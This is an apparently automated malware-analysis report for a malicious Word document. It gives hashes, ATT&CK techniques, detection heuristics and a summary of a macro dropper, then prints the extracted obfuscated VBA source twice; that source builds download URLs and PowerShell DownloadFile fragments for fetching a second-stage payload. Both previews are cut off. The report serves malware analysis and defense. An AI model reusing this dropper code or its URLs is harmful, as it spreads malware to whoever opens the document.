Office (OLE) malware analysis — malicious · 9cdfee7af473d4df

MALICIOUS

Office (OLE)

189.5 KB Created: 2017-12-10 21:20:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 1da70d6bdc2ab682bf160578e4b485bb SHA-1: c619cb5b6b24c970a6ab87156261b85901398c93 SHA-256: 9cdfee7af473d4df32f6ae5d4da0d87559fef76bfabb4be5082a221f7bd702b6

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and constructs a URL from concatenated strings, specifically 'http://test.tnl3fpCvf.lt/XRuZlCvp9I/'. This indicates an attempt to download and execute a second-stage payload, a common technique for malware droppers. The presence of the AutoOpen macro and the Shell() call strongly suggests malicious intent.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73954 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	73954 bytes
SHA-256: `c935bcb1e33ae2b747fd1d5ac6744ac30067bbf63626fbb942a23712387f5168`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MZYvoqVzwI" Function PpGKCiW() QfapAfZNY = UCase("ahYpwCtv" + "QvqLTtAMr" + "UZZSbHF" + "NiPTzzQPabzN" + "pYbzXjz") + UCase("ZzBuuKlAOzht" + "jMBwwrvDSZ" + "dzfBwSDXH" + "njOYDoiOLdRUjJ" + "aCYsCjGa") BGztnCPAcY = Mid("wMVOI = IlCv+lCvBKhttp:/lCv+lCv/test.tnlCv+l3fp+3fpCvf.ltlCv+lCv/XRuZlCv+lCvp9I/,http'+':/lCv+lCv/www.lCv+lCJo7UjSir5zGLUz3iR4a", 6, 103) YqKGIwiCM = UCase("QoPsjSuXVNc" + "LrISDdLB" + "lsuBLfk" + "TMZzIwokJv" + "OUBPpHhEuOTXNp") + UCase("fvVqUnJABB" + "KCsThui" + "mjjdFudbq" + "AoLHiTtP" + "aJFTANlzi") FbJXISPiUiG = UCase("QwfkCwtKlasdm" + "vCQoHvwJOW" + "XQffFLjIbHGJu" + "PkHjIQin" + "dpmuzfqHhJv") + UCase("fOifOMULQos" + "crLpaGFHkl" + "pTRhdkA" + "AzjjVcDtDN" + "OpwPRHUBjbD") iBKwbPkBhi = UCase("ffRtjhinYwS" + "qiminhOPaJ" + "BhViidMjlclc" + "ClYOIubzs" + "lBKoXEhGCWt") + UCase("MKDvJLNhs" + "FUbCIzH" + "ioJCkcYopiDW" + "GYnZOLMkPkLm" + "vpNUwhwVnEG") rztTdp = Mid("iZ8nDlmSkWvtlCv+lCvo3fp+'+'3fpur-talk.com/wplCv+lCv-clCv+lCvontent/lCv+lCvB0wiYi/,h9247o4hioOzFDncbCuFI", 11, 73) PvGpQToA = UCase("uuNpMzfraPPsX" + "IpNWNCuHXLsDzZ" + "jTwzLmpH" + "rvYVBwZEsVzi" + "KNBtmWBwIzFjr") + UCase("RvMJShafRdYGYm" + "LdadvJkvRzSGq" + "wSmKCIIjMjzN" + "wXVjwPIwUfF" + "mhzuKzbjwSKlvV") BmdwPvX = UCase("aaXUWjdV" + "zwodtouwSE" + "PEhibUhWXNSTjP" + "lpPtAiRKvtZrC" + "EZUAIuVsotBBG") + UCase("IjcHOFCFjZDQwt" + "oCdidTnzSYUS" + "AWrzbTCORSdzq" + "svzswcGzrYXdiU" + "KitnJEJiEofq") DMrwniX = UCase("wSBMvhGrLQfaK" + "RlTUttIEJ" + "QpNzdZcOcAMoGF" + "DHwBIjTJRoiXP" + "HjtJDwFUH") + UCase("lnRwKAdfO" + "qmJCBPzjwKv" + "MvURTiD" + "kizkQURV" + "RKDIlbUZqInzZX") DVvjzOo = Mid("EAszR5UfplCv,[CHAr]3fp+3fp36 -rEplAcE lCvf8slCv,[CHAr]92 -rEplAcE (wCaAUCdXP", 9, 60) Eshuf = UCase("XjzhmUuCVj" + "pmBfTbzohf" + "jjJhujMt" + "RljcHYq" + "KZjoBVwXDiOcq") + UCase("IrQAPYFZLpbdG" + "CYYulGi" + "zRhOLJrE" + "QMacsLGISlkOqN" + "PuUiFUqkMA") WLAZjIYXTF = UCase("SiaVdsjwbFtHmY" + "jzcjiAstbTAr" + "WQJKLCShtwr" + "kLcDrUiB" + "bpXtswa") + UCase("zBdBEbKviwkGE" + "BkZuoQqjzSqYv" + "mRSGrsuuNEj" + "RHJXwuznomTw" + "KwPCLLjf") dsBcGVmOr = UCase("AKTQjnpc" + "scviaSdVX" + "UFGFkfEUlYwjJ" + "zqhfGZFhrNrjt" + "WrUBvtXEtEikf") + UCase("EEPISFlkk" + "OwjmNtOAmNwuDw" + "PSswdwWtmdnwi" + "nGlGWnzKk" + "ApizRUKASVCns") EGFdsG = Mid("1Az4nj516CvxeIBK;lCv+lC'+'vforlCv+lCveach(Zcf'+'lCv+lCvabc in lC3fp+3fpv+lCvZ'+'cfbcd){trlCv+lCvy{ZcffrlCv+lCvanclC'+'v+lCv.DownloadFile(ZclCv+lCvfabc.T3fp+'+'3fpoStrl'+'Cv+lCvQP0JJmQkfJbaorFzniLJLnjjXp6", 10, 167) GUlbUQPZ = UCase("IRidPMtHWUOE" + "iacTvYImAzTwht" + "sCtzEjzstUf" + "tjPwkDLQparPH" + "wITKiiSPPU") + UCase("OASiiizQlOF" + "zjvVdpSKdrji" + "YipwUiRvWVDth" + "rszWItXT" + "jMpZzJwWTjr") mCsdjM = UCase("GBsEwJaujjwHM" + "hJqFhCvoOYcST" + "jMOANzzVvsNb" + "GIwzKIVSI" + "wGpsSmTciqo") + UCase("UUwtOoMOz" + "GmpjPZRKzTXhR" + "XFhibQikbsoiAQ" + "hGuhDzDDlWuKU" + "UqmCEVJHdmhKV") bEjiwsVtVEh = UCase("PEHbXqLEdYSd" + "PnkwzRqnbb" + "cTrUQCTHpJljDb" + "DtSIzZJ" + "flbMsdqzodMwEw") + UCase("nbELnPiEhWvNz" + "SbVTYMjppa" + "wJwGqczFCih" + "OWfBhtpzPtiVBr" + "flGzldjoFhz") iMcVXoMvFfo = Mid("CB9joS0lNDsht5jh5tavaMfXNvplCv+lC3fp+3fpvtionlCv+l3fp+3fpC'+'v.MlCv'+'+lCvelCv+lCvssa'+'ge;}}lCv)-'+'cRePLacElCvZcf3fp+3fMvNL0X0F3", 26, 96) NkRGcAdJ = UCase("wslYAQQM" + "AOuUCvLhFNr" + "BBbwvjZd" + "ztisGtlV" + "DdHNmoKB") + UCase("MRFcwdDv" + "KcFjqjVAVPcvB" + "LvKOznOmmuc" + "LCXwAoKDb" + "EWmYsmTuZLKruh") bficum = UCase("uwIuqkjGztLCv" + "dPFfbEw" + "TTvjwRihZTjCvA" + "wokVlima" + "ClAQiZF") + UCase("swdozJoOYPTrT" + "EcIGqrjNOjtri" + "RRzzOrKw" + "SzfvGMTTik" + "jXIbjOIi") AOhQvfBwkUH = UCase("qJzrBMli" + "QJOnjOdiZW" + "twippTkVGphb" + "AToiYVXCPjz" + "wuKHCUmWpNui") + UCase("BhcQcjji" + "nPawJEzkdMhI" + "ZZNDVvEnmYJWW" + "vlnCOzNHuhDKi" + "FkhzwKICDY") FYdpSIpKTh = Mid("TYr9o85tCLQU9cuu6SflGnCv,httplCv+l ... (truncated)

SHA-256: c935bcb1e33ae2b747fd1d5ac6744ac30067bbf63626fbb942a23712387f5168

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MZYvoqVzwI"
Function PpGKCiW()
QfapAfZNY = UCase("ahYpwCtv" + "QvqLTtAMr" + "UZZSbHF" + "NiPTzzQPabzN" + "pYbzXjz") + UCase("ZzBuuKlAOzht" + "jMBwwrvDSZ" + "dzfBwSDXH" + "njOYDoiOLdRUjJ" + "aCYsCjGa")
BGztnCPAcY = Mid("wMVOI = IlCv+lCvBKhttp:/lCv+lCv/test.tnlCv+l3fp+3fpCvf.ltlCv+lCv/XRuZlCv+lCvp9I/,http'+':/lCv+lCv/www.lCv+lCJo7UjSir5zGLUz3iR4a", 6, 103)
YqKGIwiCM = UCase("QoPsjSuXVNc" + "LrISDdLB" + "lsuBLfk" + "TMZzIwokJv" + "OUBPpHhEuOTXNp") + UCase("fvVqUnJABB" + "KCsThui" + "mjjdFudbq" + "AoLHiTtP" + "aJFTANlzi")
FbJXISPiUiG = UCase("QwfkCwtKlasdm" + "vCQoHvwJOW" + "XQffFLjIbHGJu" + "PkHjIQin" + "dpmuzfqHhJv") + UCase("fOifOMULQos" + "crLpaGFHkl" + "pTRhdkA" + "AzjjVcDtDN" + "OpwPRHUBjbD")
iBKwbPkBhi = UCase("ffRtjhinYwS" + "qiminhOPaJ" + "BhViidMjlclc" + "ClYOIubzs" + "lBKoXEhGCWt") + UCase("MKDvJLNhs" + "FUbCIzH" + "ioJCkcYopiDW" + "GYnZOLMkPkLm" + "vpNUwhwVnEG")
rztTdp = Mid("iZ8nDlmSkWvtlCv+lCvo3fp+'+'3fpur-talk.com/wplCv+lCv-clCv+lCvontent/lCv+lCvB0wiYi/,h9247o4hioOzFDncbCuFI", 11, 73)
PvGpQToA = UCase("uuNpMzfraPPsX" + "IpNWNCuHXLsDzZ" + "jTwzLmpH" + "rvYVBwZEsVzi" + "KNBtmWBwIzFjr") + UCase("RvMJShafRdYGYm" + "LdadvJkvRzSGq" + "wSmKCIIjMjzN" + "wXVjwPIwUfF" + "mhzuKzbjwSKlvV")
BmdwPvX = UCase("aaXUWjdV" + "zwodtouwSE" + "PEhibUhWXNSTjP" + "lpPtAiRKvtZrC" + "EZUAIuVsotBBG") + UCase("IjcHOFCFjZDQwt" + "oCdidTnzSYUS" + "AWrzbTCORSdzq" + "svzswcGzrYXdiU" + "KitnJEJiEofq")
DMrwniX = UCase("wSBMvhGrLQfaK" + "RlTUttIEJ" + "QpNzdZcOcAMoGF" + "DHwBIjTJRoiXP" + "HjtJDwFUH") + UCase("lnRwKAdfO" + "qmJCBPzjwKv" + "MvURTiD" + "kizkQURV" + "RKDIlbUZqInzZX")
DVvjzOo = Mid("EAszR5UfplCv,[CHAr]3fp+3fp36 -rEplAcE lCvf8slCv,[CHAr]92  -rEplAcE (wCaAUCdXP", 9, 60)
Eshuf = UCase("XjzhmUuCVj" + "pmBfTbzohf" + "jjJhujMt" + "RljcHYq" + "KZjoBVwXDiOcq") + UCase("IrQAPYFZLpbdG" + "CYYulGi" + "zRhOLJrE" + "QMacsLGISlkOqN" + "PuUiFUqkMA")
WLAZjIYXTF = UCase("SiaVdsjwbFtHmY" + "jzcjiAstbTAr" + "WQJKLCShtwr" + "kLcDrUiB" + "bpXtswa") + UCase("zBdBEbKviwkGE" + "BkZuoQqjzSqYv" + "mRSGrsuuNEj" + "RHJXwuznomTw" + "KwPCLLjf")
dsBcGVmOr = UCase("AKTQjnpc" + "scviaSdVX" + "UFGFkfEUlYwjJ" + "zqhfGZFhrNrjt" + "WrUBvtXEtEikf") + UCase("EEPISFlkk" + "OwjmNtOAmNwuDw" + "PSswdwWtmdnwi" + "nGlGWnzKk" + "ApizRUKASVCns")
EGFdsG = Mid("1Az4nj516CvxeIBK;lCv+lC'+'vforlCv+lCveach(Zcf'+'lCv+lCvabc in lC3fp+3fpv+lCvZ'+'cfbcd){trlCv+lCvy{ZcffrlCv+lCvanclC'+'v+lCv.DownloadFile(ZclCv+lCvfabc.T3fp+'+'3fpoStrl'+'Cv+lCvQP0JJmQkfJbaorFzniLJLnjjXp6", 10, 167)
GUlbUQPZ = UCase("IRidPMtHWUOE" + "iacTvYImAzTwht" + "sCtzEjzstUf" + "tjPwkDLQparPH" + "wITKiiSPPU") + UCase("OASiiizQlOF" + "zjvVdpSKdrji" + "YipwUiRvWVDth" + "rszWItXT" + "jMpZzJwWTjr")
mCsdjM = UCase("GBsEwJaujjwHM" + "hJqFhCvoOYcST" + "jMOANzzVvsNb" + "GIwzKIVSI" + "wGpsSmTciqo") + UCase("UUwtOoMOz" + "GmpjPZRKzTXhR" + "XFhibQikbsoiAQ" + "hGuhDzDDlWuKU" + "UqmCEVJHdmhKV")
bEjiwsVtVEh = UCase("PEHbXqLEdYSd" + "PnkwzRqnbb" + "cTrUQCTHpJljDb" + "DtSIzZJ" + "flbMsdqzodMwEw") + UCase("nbELnPiEhWvNz" + "SbVTYMjppa" + "wJwGqczFCih" + "OWfBhtpzPtiVBr" + "flGzldjoFhz")
iMcVXoMvFfo = Mid("CB9joS0lNDsht5jh5tavaMfXNvplCv+lC3fp+3fpvtionlCv+l3fp+3fpC'+'v.MlCv'+'+lCvelCv+lCvssa'+'ge;}}lCv)-'+'cRePLacElCvZcf3fp+3fMvNL0X0F3", 26, 96)
NkRGcAdJ = UCase("wslYAQQM" + "AOuUCvLhFNr" + "BBbwvjZd" + "ztisGtlV" + "DdHNmoKB") + UCase("MRFcwdDv" + "KcFjqjVAVPcvB" + "LvKOznOmmuc" + "LCXwAoKDb" + "EWmYsmTuZLKruh")
bficum = UCase("uwIuqkjGztLCv" + "dPFfbEw" + "TTvjwRihZTjCvA" + "wokVlima" + "ClAQiZF") + UCase("swdozJoOYPTrT" + "EcIGqrjNOjtri" + "RRzzOrKw" + "SzfvGMTTik" + "jXIbjOIi")
AOhQvfBwkUH = UCase("qJzrBMli" + "QJOnjOdiZW" + "twippTkVGphb" + "AToiYVXCPjz" + "wuKHCUmWpNui") + UCase("BhcQcjji" + "nPawJEzkdMhI" + "ZZNDVvEnmYJWW" + "vlnCOzNHuhDKi" + "FkhzwKICDY")
FYdpSIpKTh = Mid("TYr9o85tCLQU9cuu6SflGnCv,httplCv+l
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.